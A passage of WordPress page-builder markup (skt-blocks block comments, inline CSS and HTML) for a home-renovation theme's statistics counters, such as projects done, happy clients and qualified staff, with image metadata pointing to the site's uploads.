.skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">499</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Home Renovation</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topMargin\":2,\"bottomPaddingMobile\":40,\"blockId\":\"67df1bfe-896e-44c7-bd6e-6aaf6964cf1d\"} -->\n<style type=\"text/css\"> .block-67df1bfe-896e-44c7-bd6e-6aaf6964cf1d .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-67df1bfe-896e-44c7-bd6e-6aaf6964cf1d .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-67df1bfe-896e-44c7-bd6e-6aaf6964cf1d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: 2px; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-67df1bfe-896e-44c7-bd6e-6aaf6964cf1d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-67df1bfe-896e-44c7-bd6e-6aaf6964cf1d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-67df1bfe-896e-44c7-bd6e-6aaf6964cf1d\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":23,\"title\":\"project-img1\",\"filename\":\"project-img1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:35.000Z\",\"modified\":\"2021-05-25T13:48:35.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"d4ddb6cf00\",\"delete\":\"098eea62dc\",\"edit\":\"9345bb08ba\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=23u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1904,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":42,\"width\":42,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\",\"height\":42,\"width\":42,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":42,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"bd99dc76-0eae-4a02-b907-7f82fde09603\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603 .skt-blocks-ifb-image-content img {\n width: 42px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">3541</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Project Done</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"67d4b8a4-6740-44c1-8315-001228127f3b\"} -->\n<style type=\"text/css\"> .block-67d4b8a4-6740-44c1-8315-001228127f3b .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-67d4b8a4-6740-44c1-8315-001228127f3b .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-67d4b8a4-6740-44c1-8315-001228127f3b .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-67d4b8a4-6740-44c1-8315-001228127f3b .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-67d4b8a4-6740-44c1-8315-001228127f3b .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-67d4b8a4-6740-44c1-8315-001228127f3b\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":25,\"title\":\"project-img3\",\"filename\":\"project-img3.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img3/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img3\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"166be17603\",\"delete\":\"fe3f8568d2\",\"edit\":\"ec62d06df5\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=25u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1929,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":67,\"width\":67,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\",\"height\":67,\"width\":67,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":67,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"ddc2115b-19da-4fd1-9373-7d3945f2a62f\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f .skt-blocks-ifb-image-content img {\n width: 67px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">485</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Happy Clients</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"blockId\":\"87728901-354e-4436-8ea8-0b84a45f4e35\"} -->\n<style type=\"text/css\"> .block-87728901-354e-4436-8ea8-0b84a45f4e35 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-87728901-354e-4436-8ea8-0b84a45f4e35 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-87728901-354e-4436-8ea8-0b84a45f4e35 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-87728901-354e-4436-8ea8-0b84a45f4e35 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-87728901-354e-4436-8ea8-0b84a45f4e35 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-87728901-354e-4436-8ea8-0b84a45f4e35\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":26,\"title\":\"project-img4\",\"filename\":\"project-img4.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img4/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img4\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"eb6a446cde\",\"delete\":\"a8a00228e6\",\"edit\":\"ed515a959a\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=26u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1904,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":42,\"width\":42,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\",\"height\":42,\"width\":42,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":42,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6 .skt-blocks-ifb-image-content img {\n width: 42px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">120</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Qualified Satff</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"2c42b546-5b19-4262-8165-7d9dd90f6b0c\",\"topPadding\":100,\"topPaddingMobile\":60,\"topPaddingTablet\":80,\"bottomPadding\":0,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"backgroundImage\":\"https://cteisys.com/wp-content/uploads/2021/05/video-bg.jpg\",\"backgroundPosition\":\"center center\",\"backgroundType\":\"image\",\"className\":\"gb-renovation-section-6\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-6 skt-blocks-block-section-outer-wrap block-2c42b546-5b19-4262-8165-7d9dd90f6b0c background-type-image alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 60px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(https://cteisys.com/wp-content/uploads/2021/05/video-bg.jpg); background-position: center center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n 